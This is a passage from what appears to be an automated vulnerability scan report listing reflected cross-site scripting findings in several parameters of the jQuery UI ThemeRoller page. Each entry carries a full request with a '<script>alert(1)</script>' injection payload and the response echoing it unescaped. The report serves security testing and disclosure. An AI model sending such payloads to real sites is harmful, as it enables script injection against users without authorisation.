ighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngcad01"><script>alert(1)</script>9374f53a89e&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngcad01"><script>alert(1)</script>9374f53a89e&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.52. http://jqueryui.com/themeroller/ [borderColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b67c"><script>alert(1)</script>0674f60c158 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=9999992b67c"><script>alert(1)</script>0674f60c158&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=9999992b67c"><script>alert(1)</script>0674f60c158&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColor
...[SNIP]...

2.53. http://jqueryui.com/themeroller/ [borderColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57884"><script>alert(1)</script>b65ac416221 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa57884"><script>alert(1)</script>b65ac416221&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa57884"><script>alert(1)</script>b65ac416221&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorH
...[SNIP]...

2.54. http://jqueryui.com/themeroller/ [borderColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2586"><script>alert(1)</script>686e0674453 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999e2586"><script>alert(1)</script>686e0674453&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
g&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999e2586"><script>alert(1)</script>686e0674453&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada
...[SNIP]...

2.55. http://jqueryui.com/themeroller/ [borderColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8383"><script>alert(1)</script>069808b3d28 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0ac8383"><script>alert(1)</script>069808b3d28&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0ac8383"><script>alert(1)</script>069808b3d28&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

2.56. http://jqueryui.com/themeroller/ [borderColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a58cc"><script>alert(1)</script>2f5ab107d8f was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaa58cc"><script>alert(1)</script>2f5ab107d8f&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaa58cc"><script>alert(1)</script>2f5ab107d8f&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8
...[SNIP]...

2.57. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6081e"><script>alert(1)</script>c30c52ff5c6 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa16081e"><script>alert(1)</script>c30c52ff5c6&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rd.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa16081e"><script>alert(1)</script>c30c52ff5c6&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaa
...[SNIP]...

2.58. http://jqueryui.com/themeroller/ [borderColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c1f"><script>alert(1)</script>bc465936fd5 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=99999913c1f"><script>alert(1)</script>bc465936fd5&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=99999913c1f"><script>alert(1)</script>bc465936fd5&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=f
...[SNIP]...

2.59. http://jqueryui.com/themeroller/ [cornerRadius parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 707ae"><script>alert(1)</script>2116519edf5 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px707ae"><script>alert(1)</script>2116519edf5&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px707ae"><script>alert(1)</script>2116519edf5&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

2.60. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67b25"><script>alert(1)</script>6776f4259fb was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px67b25"><script>alert(1)</script>6776f4259fb HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
